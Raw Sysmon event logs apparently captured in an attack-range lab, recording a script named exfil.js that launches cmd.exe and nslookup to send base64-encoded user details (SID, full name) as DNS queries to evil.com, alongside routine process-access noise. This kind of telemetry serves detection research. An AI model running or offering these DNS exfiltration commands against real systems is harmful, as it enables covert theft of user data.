14:16:29.260{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199827Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.260{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199826Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.260{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17BD-629A-3540-000000005F02}8108C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000199825Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.260{2E1864BB-17A1-629A-783D-000000005F02}55528020C:\Windows\System32\WScript.exe{2E1864BB-17BD-629A-3540-000000005F02}8108C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000199824Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.268{2E1864BB-17BD-629A-3540-000000005F02}8108C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlcmwv.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000199823Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.260{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlvoxhv.tmpMD5=FB87DC05AA42B3CEFD4C629E53F524B0,SHA256=D8FD32DBA2A6AFDF9B6B8FFC9EECC534FF5A98DB8AFE74AF80C8BC0F2B8F0CBD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000199822Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.211{2E1864BB-17BD-629A-3340-000000005F02}30042692C:\Windows\system32\conhost.exe{2E1864BB-17BD-629A-3440-000000005F02}5332C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199821Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.191{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17BD-629A-3440-000000005F02}5332C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000199820Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.191{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199819Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.191{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199818Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.191{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199817Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.191{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199816Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.191{2E1864BB-17BD-629A-3240-000000005F02}12164556C:\Windows\system32\cmd.exe{2E1864BB-17BD-629A-3440-000000005F02}5332C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000199815Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.203{2E1864BB-17BD-629A-3440-000000005F02}5332C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAy evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17BD-629A-3240-000000005F02}1216C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlvoxhv.tmp 2>&1 23542300x8000000000000000199814Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.176{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6480CA379823A0CE62FC28709EFD259F,SHA256=2F1590A6DB65C404D47C9379E47B48210B9D9F79A6C8345AC1D41357D4ABD808,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000199813Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.160{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17BD-629A-3340-000000005F02}3004C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199812Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.160{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17BD-629A-3340-000000005F02}3004C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199811Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.144{2E1864BB-17BD-629A-3340-000000005F02}30042692C:\Windows\system32\conhost.exe{2E1864BB-17BD-629A-3240-000000005F02}1216C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199810Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.144{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17BD-629A-3340-000000005F02}3004C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000199809Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.129{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199808Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.129{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199807Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.129{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199806Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.129{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199805Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.129{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17BD-629A-3240-000000005F02}1216C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000199804Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.129{2E1864BB-17A1-629A-783D-000000005F02}55526324C:\Windows\System32\WScript.exe{2E1864BB-17BD-629A-3240-000000005F02}1216C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000199803Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.134{2E1864BB-17BD-629A-3240-000000005F02}1216C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlvoxhv.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000199802Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.129{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlqma.tmpMD5=FB20CB6722435F1F35A02C74A813F0C5,SHA256=8013914F02524B11209965048D9BE8D67580A0B87255186F58E48D3DD646BD34,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000199801Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.092{2E1864BB-17BD-629A-3040-000000005F02}58165000C:\Windows\system32\conhost.exe{2E1864BB-17BD-629A-3140-000000005F02}4740C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199800Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.092{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199799Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.092{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199798Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.092{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199797Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 